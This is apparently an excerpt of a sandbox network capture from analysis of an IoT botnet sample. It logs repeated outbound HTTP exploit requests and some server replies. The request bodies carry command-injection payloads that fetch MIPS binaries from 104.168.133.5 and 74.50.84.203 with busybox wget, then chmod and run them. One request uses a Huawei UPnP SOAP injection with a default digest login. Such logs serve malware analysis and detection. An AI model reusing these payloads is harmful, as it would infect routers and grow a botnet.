                                              394192.168.2.135242431.136.19.2408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:10.999154091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:11.590394020 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.742430925 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:15.046350002 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:19.654422045 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:28.870335102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.558265924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              395192.168.2.133473494.154.96.2208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:11.021040916 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:11.228908062 CET358INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:11 GMT
                                              Server: Apache
                                              Content-Length: 126
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                              Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              396192.168.2.133973494.234.167.1368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:11.025839090 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:11.271929979 CET1229INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 1012
                                              Date: Thu, 23 Nov 2023 04:17:11 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/6.0.29 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource (/cgi-bin/ViewLog.asp) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.29</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              397192.168.2.135608294.122.126.1978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:11.037055969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              398192.168.2.134152294.120.6.238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:11.040703058 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              399192.168.2.135862841.239.73.17337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:13.236870050 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:13.495445967 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              400192.168.2.135511494.130.152.358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.504374981 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:15.590354919 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:15.785005093 CET412INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:17:15 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              401192.168.2.134174062.29.85.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.529405117 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              402192.168.2.134335494.17.160.2248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.542429924 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              403192.168.2.135892262.29.81.1058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.562998056 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
